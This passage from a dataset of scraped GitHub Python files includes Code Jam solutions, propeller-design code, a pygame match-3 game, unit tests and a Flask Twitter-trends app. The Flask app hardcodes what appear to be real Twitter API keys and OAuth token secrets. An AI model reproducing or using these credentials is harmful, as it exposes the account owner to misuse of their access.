continue\r\n\r\n r_attack = 10000000\r\n for j in range(0, 100):\r\n temp_r = math.ceil(hk * 1.0 / (b * j + ad)) + j\r\n r_attack = min(temp_r, r_attack)\r\n r_attack = int(r_attack)\r\n\r\n r_cure = 10000000\r\n for x in range(0, 101):\r\n t_hd = hd\r\n t_ak = ak\r\n t_cure = x\r\n if x > 0:\r\n for j in range(x):\r\n if t_hd <= t_ak - d:\r\n t_cure += 1\r\n t_hd = hd - t_ak\r\n t_ak -= d\r\n if t_ak < 0:\r\n t_ak = 0\r\n t_hd -= t_ak\r\n if r_attack > 1:\r\n if hd <= t_ak + t_ak:\r\n continue\r\n for j in range(r_attack - 1):\r\n if t_hd <= t_ak:\r\n t_cure += 1\r\n t_hd = hd - t_ak\r\n t_hd -= t_ak\r\n if t_cure < r_cure:\r\n r_cure = t_cure\r\n r_cure = int(r_cure)\r\n print>>fout, \"Case #{}: {}\".format(i, r_attack + r_cure)\r\nfin.close()\r\nfout.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_205/52.py","file_name":"52.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23583828831","text":"#! /usr/bin/env python3\n\nimport os\nimport os.path\nimport argparse\nfrom pprint import pprint\n\ndef solve(N, R, O, Y, G, B, V):\n # With O, G and V, only possible sequences are:\n # BOBOB, RGRGR, YVYVYV\n if O > B or G > R or V > Y:\n return \"IMPOSSIBLE\"\n\n if R == G and N == R+G:\n print(\"Special case RG\")\n return \"RG\" * G\n if O == B and N == O+B:\n print(\"Special case BO\")\n return \"BO\" * B\n if V == Y and N == Y+V:\n print(\"Special case YV, N={}\".format(N))\n return \"YV\" * V\n\n special = {}\n if G > 0:\n special[\"R\"] = \"RG\" * G + \"R\"\n R -= G\n N -= 2*G\n if O > 0:\n special[\"B\"] = \"BO\" * O + \"B\"\n B -= O\n N -= 2*O\n if V > 0:\n special[\"Y\"] = \"YV\" * V + \"Y\"\n Y -= V\n N -= 2*V\n\n result = \"\"\n values = [[\"R\", R], [\"Y\", Y], [\"B\", B]]\n last = ''\n\n while N > 0:\n values.sort(key=lambda x: x[1], reverse=True)\n assert(values[0][1] > 0)\n index = 0\n first_char = values[index][0]\n\n if first_char == last:\n print(\"Can't use first\")\n index = 1\n if values[index][1] == 0:\n return \"IMPOSSIBLE\"\n\n if N <= 3 and len(result) > 0 and result[0] != last:\n print(\"Fixing termination, result[0]={}, last={}\".format(result[0], last))\n for i in range(3):\n if values[i][0] == result[0] and values[i][1] != 0:\n index = i\n break\n\n last = values[index][0]\n if last in special:\n result += special[last]\n del special[last]\n else:\n result += values[index][0]\n\n values[index][1] -= 1\n N -= 1\n print(\"{} {}={} {}={} {}={}\".format(result, values[0][0], values[0][1], values[1][0], values[1][1], values[2][0], values[2][1]))\n\n if len(result) == 0 or result[0] == result[-1]:\n return \"IMPOSSIBLE\"\n\n return result\n\n \nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"filename\", help='Filename')\n\n args = parser.parse_args()\n\n outputfile = os.path.splitext(args.filename)[0] + \".out\"\n\n with open(args.filename, 'r') as f:\n with open(outputfile, 'w+') as fout:\n num_tests = int(f.readline().strip())\n for testcase in range(1,num_tests+1):\n N, R, O, Y, G, B, V = [int(x) for x in f.readline().split(\" \")]\n print(\"Case #{} Input: num={} R={} O={} Y={} G={} B={} V={}\".format(testcase, N, R, O, Y, G, B, V))\n result = solve(N, R, O, Y, G, B, V)\n print(\"Output: {}\".format(result))\n fout.write(\"Case #{}: {}\\n\".format(testcase, result))\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_207/613.py","file_name":"613.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20394137065","text":"# 导入cv模块\nimport cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\nexposure=[2000,3000,4000,5000,6000,7000,8000,9000,10000,11000,12000,13000,14000,15000,16000,17000,18000,19000,20000,70000,120000,170000,220000]\navgnoise_exp=[]\nfor j in range(0,len(exposure)):\n print(\"./fixgain/\"+str(exposure[j])+\"(0).jpg\")\n raw_img = cv.imread(\"./fixgain/2000(0).jpg\")\n size = raw_img.shape\n print(\"!\")\n imgarray = np.zeros([10, size[0]*size[1]], dtype=np.float)\n for i in range(0, 10):\n img = cv.imread(\"./fixgain/\"+str(exposure[j])+\"(\"+ str(i) +\").jpg\")\n img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n img = img.astype(np.float32)\n imgarray[i, :] = img.flatten()\n avgarray = np.mean(imgarray, 0)\n std_noise=np.std(avgarray)\n avgnoise_exp.append(std_noise)\nplt.plot(exposure,avgnoise_exp,linewidth=2)\nplt.title(\"fix pattern noise-exp\",fontsize=18)\nplt.xlabel(\"exposure\",fontsize=14)\nplt.ylabel(\"avg_noise\",fontsize=14)\nplt.savefig(\"./fpnoise_exp.png\")","repo_name":"Justherozen/Inteligent_visual_imformation_acquisition","sub_path":"A1/Fix_pattern_noise.py","file_name":"Fix_pattern_noise.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24349687977","text":"import bpy\n\nparts = [\"field_particles\", \"field_particles.001\"]\nvelo = [None, 0, 0.062, 0.1, 0.062, 0]\n\nscene = bpy.data.scenes[0]\n\nfor fno in [1, 2, 3, 4, 5]:\n scene.frame_set(fno)\n for p in parts:\n bpy.data.particles[p].object_align_factor[0] = velo[fno]\n bpy.context.scene.render.filepath = \"wheatfield%04d\" % fno\n bpy.ops.render.render(write_still = True)\n\n","repo_name":"tothxa/wl_graphics_re-export","sub_path":"tribe_immo/wheatfield/wheat_anim_frames.py","file_name":"wheat_anim_frames.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"38837823403","text":"## @ingroup Methods-Propulsion\n# propeller_design.py\n# \n# Created: Jul 2014, E. Botero\n# Modified: Feb 2016, E. Botero\n# Jul 2017, M. Clarke\n# Mar 2020, M. Clarke\n# Sep 2020, M. Clarke\n# Feb 2022, M. Clarke\n\n# ----------------------------------------------------------------------\n# Imports\n# ----------------------------------------------------------------------\nimport SUAVE\nfrom SUAVE.Core import Data\nfrom SUAVE.Core.Utilities import interp2d\nimport numpy as np\nimport scipy as sp \nfrom scipy.optimize import root \nfrom SUAVE.Methods.Geometry.Two_Dimensional.Cross_Section.Airfoil.compute_airfoil_properties \\\n import compute_airfoil_properties\nfrom SUAVE.Methods.Geometry.Two_Dimensional.Cross_Section.Airfoil.compute_naca_4series \\\n import compute_naca_4series\nfrom SUAVE.Methods.Geometry.Two_Dimensional.Cross_Section.Airfoil.import_airfoil_geometry\\\n import import_airfoil_geometry\n# ----------------------------------------------------------------------\n# Propeller Design\n# ----------------------------------------------------------------------\n\ndef propeller_design(prop,number_of_stations=20):\n \"\"\" Optimizes propeller chord and twist given input parameters.\n \n Inputs:\n Either design power or thrust\n prop_attributes.\n hub radius [m]\n tip radius [m]\n rotation rate [rad/s]\n freestream velocity [m/s]\n number of blades \n number of stations\n design lift coefficient\n design_altitude [m]\n airfoil data\n \n Outputs:\n Twist distribution [array of radians]\n Chord distribution [array of meters]\n \n Assumptions/ Source:\n Based on Design of Optimum Propellers by Adkins and Liebeck\n \n \"\"\"\n # Unpack\n N = number_of_stations # this number determines the discretization of the propeller into stations\n B = prop.number_of_blades\n R = prop.tip_radius\n Rh = prop.hub_radius\n omega = prop.angular_velocity # Rotation Rate in rad/s\n V = prop.freestream_velocity # Freestream Velocity\n Cl = prop.design_Cl # Design Lift Coefficient\n alt = prop.design_altitude\n Thrust = prop.design_thrust\n Power = prop.design_power\n airfoils = prop.Airfoils \n a_loc = prop.airfoil_polar_stations\n \n if (Thrust == None) and (Power== None):\n raise AssertionError('Specify either design thrust or design power!')\n \n elif (Thrust!= None) and (Power!= None):\n raise AssertionError('Specify either design thrust or design power!') \n \n if V == 0.0:\n V = 1E-6 \n \n # Calculate atmospheric properties\n atmosphere = SUAVE.Analyses.Atmospheric.US_Standard_1976()\n atmo_data = atmosphere.compute_values(alt)\n \n p = atmo_data.pressure[0]\n T = atmo_data.temperature[0]\n rho = atmo_data.density[0]\n speed_of_sound = atmo_data.speed_of_sound[0]\n mu = atmo_data.dynamic_viscosity[0]\n nu = mu/rho\n \n # Nondimensional thrust\n if (Thrust!= None) and (Power == None):\n Tc = 2.*Thrust/(rho*(V*V)*np.pi*(R*R)) \n Pc = 0.0 \n \n elif (Thrust== None) and (Power != None):\n Tc = 0.0 \n Pc = 2.*Power/(rho*(V*V*V)*np.pi*(R*R)) \n \n tol = 1e-10 # Convergence tolerance\n\n # Step 1, assume a zeta\n zeta = 0.1 # Assume to be small initially\n \n # Step 2, determine F and phi at each blade station\n \n chi0 = Rh/R # Where the propeller blade actually starts\n chi = np.linspace(chi0,1,N+1) # Vector of nondimensional radii\n chi = chi[0:N]\n lamda = V/(omega*R) # Speed ratio\n r = chi*R # Radial coordinate\n x = omega*r/V # Nondimensional distance\n diff = 1.0 # Difference between zetas\n n = omega/(2*np.pi) # Cycles per second\n D = 2.*R \n c = 0.2 * np.ones_like(chi)\n \n # if user defines airfoil, check dimension of stations\n num_airfoils = len(airfoils.keys())\n if num_airfoils>0:\n if len(a_loc) != N:\n raise AssertionError('\\nDimension of airfoil sections must be equal to number of stations on propeller') \n \n for _,airfoil in enumerate(airfoils): \n if airfoil.geometry == None: # first, if airfoil geometry data not defined, import from geoemtry files\n if airfoil.NACA_4_series_flag: # check if naca 4 series of airfoil from datafile\n airfoil.geometry = compute_naca_4series(airfoil.coordinate_file,airfoil.number_of_points)\n else:\n airfoil.geometry = import_airfoil_geometry(airfoil.coordinate_file,airfoil.number_of_points) \n \n if airfoil.polars == None: # compute airfoil polars for airfoils\n airfoil.polars = compute_airfoil_properties(airfoil.geometry, airfoil_polar_files= airfoil.polar_files) \n else:\n print('\\nDefaulting to scaled DAE51') \n \n while diff>tol: \n # assign chord distribution\n prop.chord_distribution = c \n \n #Things that need a loop\n Tcnew = Tc \n tanphit = lamda*(1.+zeta/2.) # Tangent of the flow angle at the tip\n phit = np.arctan(tanphit) # Flow angle at the tip\n tanphi = tanphit/chi # Flow angle at every station\n f = (B/2.)*(1.-chi)/np.sin(phit) \n F = (2./np.pi)*np.arccos(np.exp(-f)) #Prandtl momentum loss factor\n phi = np.arctan(tanphi) # Flow angle at every station\n \n #Step 3, determine the product Wc, and RE\n G = F*x*np.cos(phi)*np.sin(phi) #Circulation function\n Wc = 4.*np.pi*lamda*G*V*R*zeta/(Cl*B)\n Ma = Wc/speed_of_sound\n RE = Wc/nu\n\n if num_airfoils>0:\n # assign initial values \n alpha0 = np.ones(N)*0.05\n \n # solve for optimal alpha to meet design Cl target\n sol = root(objective, x0 = alpha0 , args=(airfoils,a_loc,RE,Cl,N))\n alpha = sol.x\n \n # query surrogate for sectional Cls at stations \n Cdval = np.zeros_like(RE) \n for j,airfoil in enumerate(airfoils): \n pd = airfoil.polars\n Cdval_af = interp2d(RE,alpha,pd.reynolds_numbers, pd.angle_of_attacks, pd.drag_coefficients)\n locs = np.where(np.array(a_loc) == j )\n Cdval[locs] = Cdval_af[locs] \n \n else: \n Cdval = (0.108*(Cl**4)-0.2612*(Cl**3)+0.181*(Cl**2)-0.0139*Cl+0.0278)*((50000./RE)**0.2)\n alpha = Cl/(2.*np.pi)\n \n #More Cd scaling from Mach from AA241ab notes for turbulent skin friction\n Tw_Tinf = 1. + 1.78*(Ma**2)\n Tp_Tinf = 1. + 0.035*(Ma**2) + 0.45*(Tw_Tinf-1.)\n Tp = Tp_Tinf*T\n Rp_Rinf = (Tp_Tinf**2.5)*(Tp+110.4)/(T+110.4) \n Cd = ((1/Tp_Tinf)*(1/Rp_Rinf)**0.2)*Cdval\n \n #Step 5, change Cl and repeat steps 3 and 4 until epsilon is minimized \n epsilon = Cd/Cl \n \n #Step 6, determine a and a', and W \n a = (zeta/2.)*(np.cos(phi)**2.)*(1.-epsilon*np.tan(phi)) \n W = V*(1.+a)/np.sin(phi)\n \n #Step 7, compute the chord length and blade twist angle \n c = Wc/W\n beta = alpha + phi # Blade twist angle\n \n #Step 8, determine 4 derivatives in I and J \n Iprime1 = 4.*chi*G*(1.-epsilon*np.tan(phi))\n Iprime2 = lamda*(Iprime1/(2.*chi))*(1.+epsilon/np.tan(phi)\n )*np.sin(phi)*np.cos(phi)\n Jprime1 = 4.*chi*G*(1.+epsilon/np.tan(phi))\n Jprime2 = (Jprime1/2.)*(1.-epsilon*np.tan(phi))*(np.cos(phi)**2.) \n dchi = (chi[1]-chi[0])*np.ones_like(Jprime1)\n \n #Integrate derivatives from chi=chi0 to chi=1 \n I1 = np.dot(Iprime1,dchi)\n I2 = np.dot(Iprime2,dchi)\n J1 = np.dot(Jprime1,dchi)\n J2 = np.dot(Jprime2,dchi) \n\n #Step 9, determine zeta and and Pc or zeta and Tc \n if (Pc==0.)&(Tc!=0.): \n #First Case, Thrust is given\n #Check to see if Tc is feasible, otherwise try a reasonable number\n if Tcnew>=I2*(I1/(2.*I2))**2.:\n Tcnew = I2*(I1/(2.*I2))**2.\n zetan = (I1/(2.*I2)) - ((I1/(2.*I2))**2.-Tcnew/I2)**0.5\n\n elif (Pc!=0.)&(Tc==0.): \n #Second Case, Thrust is given\n zetan = -(J1/(J2*2.)) + ((J1/(J2*2.))**2.+Pc/J2)**0.5 \n \n #Step 10, repeat starting at step 2 with the new zeta\n diff = abs(zeta-zetan)\n \n zeta = zetan\n \n #Step 11, determine propeller efficiency etc...\n if (Pc==0.)&(Tc!=0.): \n if Tcnew>=I2*(I1/(2.*I2))**2.:\n Tcnew = I2*(I1/(2.*I2))**2.\n print('Tc infeasible, reset to:')\n print(Tcnew) \n #First Case, Thrust is given\n zeta = (I1/(2.*I2)) - ((I1/(2.*I2))**2.-Tcnew/I2)**0.5\n Pc = J1*zeta + J2*(zeta**2.)\n Tc = I1*zeta - I2*(zeta**2.)\n \n elif (Pc!=0.)&(Tc==0.): \n #Second Case, Thrust is given\n zeta = -(J1/(2.*J2)) + ((J1/(2.*J2))**2.+Pc/J2)**0.5\n Tc = I1*zeta - I2*(zeta**2.)\n Pc = J1*zeta + J2*(zeta**2.) \n \n # Calculate mid-chord alignment angle, MCA\n # This is the distance from the mid chord to the line axis out of the center of the blade\n # In this case the 1/4 chords are all aligned \n MCA = c/4. - c[0]/4.\n \n Thrust = Tc*rho*(V**2)*np.pi*(R**2)/2\n Power = Pc*rho*(V**3)*np.pi*(R**2)/2 \n Ct = Thrust/(rho*(n*n)*(D*D*D*D))\n Cp = Power/(rho*(n*n*n)*(D*D*D*D*D)) \n \n # compute max thickness distribution \n t_max = np.zeros(N) \n t_c = np.zeros(N) \n if num_airfoils>0:\n for j,airfoil in enumerate(airfoils): \n a_geo = airfoil.geometry\n locs = np.where(np.array(a_loc) == j )\n t_max[locs] = a_geo.max_thickness*c[locs] \n t_c[locs] = a_geo.thickness_to_chord \n else: \n c_blade = np.repeat(np.atleast_2d(np.linspace(0,1,N)),N, axis = 0)* np.repeat(np.atleast_2d(c).T,N, axis = 1)\n t = (5*c_blade)*(0.2969*np.sqrt(c_blade) - 0.1260*c_blade - 0.3516*(c_blade**2) + 0.2843*(c_blade**3) - 0.1015*(c_blade**4)) # local thickness distribution\n t_max = np.max(t,axis = 1) \n t_c = np.max(t,axis = 1) /c \n \n # Nondimensional thrust\n if prop.design_power == None: \n prop.design_power = Power[0] \n elif prop.design_thrust == None: \n prop.design_thrust = Thrust[0] \n \n # blade solidity\n r = chi*R # Radial coordinate \n blade_area = sp.integrate.cumtrapz(B*c, r-r[0])\n sigma = blade_area[-1]/(np.pi*R**2) \n \n prop.design_torque = Power[0]/omega\n prop.max_thickness_distribution = t_max\n prop.twist_distribution = beta\n prop.chord_distribution = c\n prop.radius_distribution = r\n prop.number_of_blades = int(B)\n prop.design_power_coefficient = Cp\n prop.design_thrust_coefficient = Ct\n prop.mid_chord_alignment = MCA\n prop.thickness_to_chord = t_c\n prop.blade_solidity = sigma\n\n return prop\n\n \ndef objective(x,airfoils,a_loc,RE,Cl,N):\n # query surrogate for sectional Cls at stations \n Cl_vals = np.zeros(N) \n for j,airfoil in enumerate(airfoils): \n pd = airfoil.polars\n Cl_af = interp2d(RE,x,pd.reynolds_numbers, pd.angle_of_attacks, pd.lift_coefficients)\n locs = np.where(np.array(a_loc) == j )\n Cl_vals[locs] = Cl_af[locs] \n \n # compute Cl residual \n Cl_residuals = Cl_vals - Cl \n return Cl_residuals \n","repo_name":"suavecode/SUAVE","sub_path":"trunk/SUAVE/Methods/Propulsion/propeller_design.py","file_name":"propeller_design.py","file_ext":"py","file_size_in_byte":12578,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"61"} +{"seq_id":"36916676584","text":"import pygame\nfrom pygame.event import Event\n\nfrom src import Constants\nfrom src.Animation import Animation\nfrom src.Quests.Quest import Quest\nfrom src.Scenes.Match3.FlowersGrid import FlowersGrid\nfrom src.Scenes.QuestScene import QuestScene\nfrom src.Utils import get_distance\n\n\nclass Match3Scene(QuestScene):\n __slots__ = (\"grid\", \"grabbed\", \"grab_point\", \"dest_tile\", \"last_click\", \"click_cooldown\")\n\n def __init__(self, main_window, name, player, quest: Quest) -> None:\n QuestScene.__init__(self, main_window=main_window, player=player, name=name, quest=quest)\n self.grid = FlowersGrid(parent=self, difficult=quest.difficult,\n position=(Constants.WINDOW_W / 2, Constants.WINDOW_H / 2), size=(8, 8))\n self.grabbed = None\n self.grab_point = 0, 0\n self.dest_tile = None\n self.last_click = 0\n self.click_cooldown = 250\n\n def on_scene_started(self) -> None:\n super().on_scene_started()\n self._timer_label.set_text(text=self._localization.get_string(\"time\"))\n self._score_label.set_text(text=self._localization.get_string(\"score\"))\n self._score_val_label.set_text(text=\"0\")\n self._timer_label.set_position((self.grid.rect.x, 10))\n self._timer_val_label.set_position(\n (self._timer_label.position[0] + self._timer_label.size[0] + 10, self._timer_label.position[1]))\n\n self._score_label.set_position(\n (self.grid.rect.x, self._timer_label.size[1] + self._timer_label.position[1] - 10))\n self._score_val_label.set_position(\n (self._score_label.position[0] + self._score_label.size[0] + 10, self._score_label.position[1]))\n\n self._finish_button.set_text(text=self._localization.get_string(\"finish_label\"))\n self._finish_button.set_padding(padding=(self._localization.get_params_by_string(\"finish_label\")[\"x_off\"], 0))\n self._finish_button.set_position((self.grid.rect.centerx - self._finish_button.size[0] / 2,\n self.grid.rect.bottomleft[1]\n + (Constants.WINDOW_H - self.grid.rect.bottomleft[1])\n / 2 - self._finish_button.size[1] / 2))\n\n def update(self, dt: float) -> None:\n super().update(dt)\n self.last_click += dt\n if self.grabbed:\n current_dest = self.dest_tile\n flower = self.grabbed.flower\n if not flower:\n self.grabbed = None\n return\n gr = self.grabbed.rect\n neighbors = self.grabbed.neighbors\n x, y = pygame.mouse.get_pos()\n flower.rect.left = x - self.grab_point[0]\n flower.rect.top = y - self.grab_point[1]\n dx = abs(flower.rect.left - self.grabbed.rect.left)\n dy = abs(flower.rect.top - self.grabbed.rect.top)\n if dx >= dy:\n if flower.rect.left < gr.left:\n if neighbors[\"left\"]:\n flower.rect.left = max(flower.rect.left, neighbors[\"left\"].rect.left)\n self.dest_tile = neighbors[\"left\"]\n if self.dest_tile.flower:\n right = gr.left + (self.dest_tile.rect.right - flower.rect.left)\n self.dest_tile.flower.rect.right = right\n else:\n flower.rect.left = gr.left\n elif flower.rect.right > gr.right:\n if neighbors[\"right\"]:\n flower.rect.right = min(flower.rect.right, neighbors[\"right\"].rect.right)\n self.dest_tile = neighbors[\"right\"]\n if self.dest_tile.flower:\n self.dest_tile.flower.rect.left = gr.right - (flower.rect.right - self.dest_tile.rect.left)\n else:\n flower.rect.right = gr.right\n flower.rect.top = gr.top\n else:\n if flower.rect.top < gr.top:\n if neighbors[\"up\"]:\n flower.rect.top = max(flower.rect.top, neighbors[\"up\"].rect.top)\n self.dest_tile = neighbors[\"up\"]\n if self.dest_tile.flower:\n self.dest_tile.flower.rect.bottom = gr.top - (flower.rect.top - self.dest_tile.rect.bottom)\n else:\n flower.rect.top = gr.top\n elif flower.rect.bottom > gr.bottom:\n if neighbors[\"down\"]:\n flower.rect.bottom = min(flower.rect.bottom, neighbors[\"down\"].rect.bottom)\n self.dest_tile = neighbors[\"down\"]\n if self.dest_tile.flower:\n self.dest_tile.flower.rect.top = gr.bottom - (flower.rect.bottom - self.dest_tile.rect.top)\n else:\n flower.rect.bottom = gr.bottom\n flower.rect.left = gr.left\n\n if current_dest and current_dest != self.dest_tile:\n if current_dest.flower:\n current_dest.flower.rect.topleft = current_dest.rect.topleft\n\n self.grid.bonus -= self.grid.bonus_cooldown * dt\n if self.grid.bonus <= 0: # TODO: optimize it\n self.grid.done = True\n\n self.grid.update(dt)\n self._score_val_label.set_text(text=str(self.score))\n\n def _time_over_handle(self) -> None:\n super()._time_over_handle()\n self._timer_val_label.set_text(\"\")\n self._timer_label.set_text(text=self._localization.get_string(\"time_over\"))\n\n def handle_events(self, event: Event) -> None:\n super().handle_events(event)\n if event.type == pygame.MOUSEBUTTONDOWN:\n if self.last_click < self.click_cooldown:\n return\n else:\n self.last_click = 0\n for cell in self.grid.cells.values():\n if cell.rect.collidepoint(event.pos) and cell.flower:\n self.grabbed = cell\n self.grid.score_multiplier = 1\n self.grab_point = \\\n (\n event.pos[0] - self.grabbed.flower.rect.left, event.pos[1] - self.grabbed.flower.rect.top\n )\n elif event.type == pygame.MOUSEBUTTONUP:\n if self.grabbed:\n if self.dest_tile and not self.dest_tile.flower:\n self.grid.reseat_flower(self.grabbed)\n return\n valid = self.grid.check_move(self.grabbed, self.dest_tile)\n if valid:\n self.swap_tiles(self.grabbed, self.dest_tile)\n else:\n self.grid.reseat_flower(self.grabbed)\n self.grid.reseat_flower(self.dest_tile)\n self.grabbed = None\n\n def draw(self, surface: pygame.Surface) -> None:\n super().draw(surface)\n self.grid.draw(surface)\n if self.grabbed and self.grabbed.flower:\n self.grabbed.flower.draw(surface)\n\n def swap_tiles(self, grabbed_tile, dest_tile) -> None:\n gf = grabbed_tile.flower\n df = dest_tile.flower\n speed = 3.5\n dist = get_distance(gf.rect.topleft, dest_tile.rect.topleft)\n if dist != 0:\n duration = int(speed * dist)\n a1 = Animation(left=dest_tile.rect.left, top=dest_tile.rect.top, duration=duration, round_values=True)\n a1.start(gf.rect)\n a2 = Animation(left=grabbed_tile.rect.left, top=grabbed_tile.rect.top, duration=duration, round_values=True)\n a2.start(df.rect)\n self.grid.animations.add(a1, a2)\n dest_tile.flower = gf\n grabbed_tile.flower = df\n self.grid.recheck = True\n","repo_name":"ludwici/BeeIsland","sub_path":"src/Scenes/Match3/Match3Scene.py","file_name":"Match3Scene.py","file_ext":"py","file_size_in_byte":7854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35523458331","text":"from flask import *\nimport tweepy\nimport json\n\napp = Flask(__name__)\nCONSUMER_KEY = 'o6mEPsrK6p646e15PXpo5Le6K'\nCONSUMER_SECRET = 'TD6pZD871HODoEisFsea13ncIc96gL2TDU6Y6uHXNggszQmCo6'\nOAUTH_TOKEN = '3192285595-GogD8gSEWVEqXHbMM8T7RkYmgbveWkqwnSffzMk'\nOAUTH_TOKEN_SECRET = 'HDqt9yA52HKsgmWSyNGYLwrCXzrtwOQSoCzcWN5gkbnij'\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(OAUTH_TOKEN, OAUTH_TOKEN_SECRET)\napi = tweepy.API(auth)\n\n# filename=open(argfile,'r')\n# f=filename.readlines()\n# filename.close()\n\ntrends1 = api.trends_place('2295405')\n\n# d=api.trends_available()\n# dic_woeid={}\n# for x in d:\n# dic_woeid[x['name'].lower()]=x['woeid']\n\ntrends_woeid=[]\nfor x in trends1[0]['trends']:\n if x['name'].startswith('#'):\n # print(x)\n temp={}\n temp['name'],temp['query']=(x['name'], x['name'][1:])\n trends_woeid.append(temp)\n\n\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\",trends=trends_woeid)\n\n@app.route('/')\ndef view_hashtag(hashtag):\n query='#'+hashtag\n searched_tweets = [status._json for status in tweepy.Cursor(api.search, q=query).items(100)]\n # tweets = [json.dumps(json_obj) for json_obj in searched_tweets]\n # print(type(tweets))\n for tweet in searched_tweets:\n print(type(tweet))\n return render_template('view_hashtags.html',tweets=searched_tweets,trends=trends_woeid,hashtag=hashtag)\n\n","repo_name":"daksh2298/hci","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22483312178","text":"import unittest\nimport os\nfrom ibis.model.ssh import SSH\nfrom ibis.utilities.config_manager import ConfigManager\nfrom ibis.settings import UNIT_TEST_ENV\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\nclass SSHActionFunctionsTest(unittest.TestCase):\n \"\"\"Tests the functionality of the Shell Action class\"\"\"\n\n def setUp(self):\n self.cfg_mgr = ConfigManager(UNIT_TEST_ENV)\n self.ssh_params = {\n 'cfg_mgr': self.cfg_mgr, 'action_type': 'ssh',\n 'name': 'fake_model',\n 'user': 'fake_open',\n 'error': 'fake_model_run_log_status_failure',\n 'execute': 'exec bash /home/fake_open/scripts/fake_openSAS.sh' + ' fake_model_'\n 'v001_t001.sas 57 1005',\n 'ok': 'fake_model_run_log_status_success',\n 'host': 'fake.sas.server',\n 'args': ['argument1'], 'capture_output': 'false'}\n\n self.my_ssh = SSH(**self.ssh_params)\n\n def test_get_execute(self):\n self.assertEquals(self.ssh_params['execute'],\n self.my_ssh.get_execute())\n\n def get_host(self):\n self.assertEquals(self.ssh_params['host'], self.my_ssh.get_host())\n\n def get_user(self):\n self.assertEquals(self.ssh_params['user'], self.my_ssh.get_user())\n\n def test_get_args(self):\n self.assertEquals(self.ssh_params['args'], self.my_ssh.get_args())\n\n def test_get_capture_output(self):\n self.assertTrue(not self.my_ssh.get_capture_output())\n\n def test_import_prep(self):\n \"\"\"Test create import_prep action\"\"\"\n params = {\n 'cfg_mgr': self.cfg_mgr, 'action_type': 'ssh',\n 'name': 'fake_model_run',\n 'user': 'fake_username',\n 'error': 'fake_model_run_log_status_failure',\n 'execute': 'exec bash /home/fake_open/scripts/fake_openSAS.sh' + ' fake_model_'\n 'v001_t001.sas 57 1005',\n 'ok': 'fake_model_run_log_status_success',\n 'host': 'fake.sas.server', 'args': ['argument1'],\n 'capture_output': 'false'}\n my_ssh = SSH(**params)\n with open(os.path.join(BASE_DIR, 'expected/ssh.xml'), 'r') as my_file:\n expected = my_file.read()\n self.assertEquals(\n str(my_ssh.generate_action()).strip(), expected.strip())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Cigna/ibis","sub_path":"ibis/model/tests/test_ssh_action.py","file_name":"test_ssh_action.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"61"} +{"seq_id":"21678668546","text":"import sys\nimport copy\ndef isredundant(i, dic):\n L1 = copy.deepcopy(dic[i[1]])\n L1.remove(i[0])\n for x in L1:\n if i[0] in dic[x]:\n return True\n return False\nfile_name = input('which data file do you want to use? ')\ntry:\n with open(f'{file_name}', 'r') as file:\n relation = file.readlines()\n file.closed\nexcept FileNotFoundError:\n print('Dont\\'t find file. ')\n sys.exit()\n\nprint(relation)\nfor i in range(len(relation)):\n relation[i] = relation[i].replace('R', '')\n relation[i] = relation[i].replace('(', '')\n relation[i] = relation[i].replace(')', '')\n relation[i] = relation[i].replace('\\n', '')\n relation[i] = relation[i].split(',')\n for j in range(len(relation[i])):\n relation[i][j] = int(relation[i][j])\nprint(relation)\n\ndic = {}\nfor i in range(len(relation)):\n for j in range(len(relation[i])):\n if relation[i][j] not in dic:\n dic.update({relation[i][j]:[]})\nfor i in range(len(relation)):\n dic[relation[i][1]].append(relation[i][0])\n\nfor i in dic:\n for j in dic:\n if i in dic[j]:\n for z in dic[i]:\n dic[j].append(z)\nfor i in dic:\n dic[i] = set(dic[i])\nprint(dic)\n\nredundant_relation = []\nfor i in relation:\n if isredundant(i, dic):\n redundant_relation.append(i)\nfor i in redundant_relation:\n relation.remove(i)\nprint(relation)\nprint('The nonredundant facts are:')\nfor i in relation:\n print(f'R({i[0]},{i[1]})')\n\n","repo_name":"ryanhe919/COMP9021","sub_path":"Assignment_1/Question4/nonredundant.py","file_name":"nonredundant.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4290917369","text":"'''\r\nAdam Roy\r\nAssignment 5\r\nCSCI 161\r\n'''\r\n\r\ndef main():\r\n title = str(input('Enter a title: '))\r\n print('You entered: ', title)\r\n col1 = input('Enter the name of column 1: ')\r\n print('You entered: ', col1)\r\n col2 = input('Enter the name of column 2: ')\r\n print('You entered: ', col2)\r\n inp = 0\r\n liststr = []\r\n listint = []\r\n while inp != '-1':\r\n inp = input('Enter a data (-1 to stop input): ')\r\n comma = 0\r\n for i in range(0, len(inp)):\r\n if inp[i] == ',':\r\n comma += 1\r\n if comma == 1:\r\n string = inp.split(',')\r\n if string[1].isnumeric() == True:\r\n liststr.append(string[0])\r\n 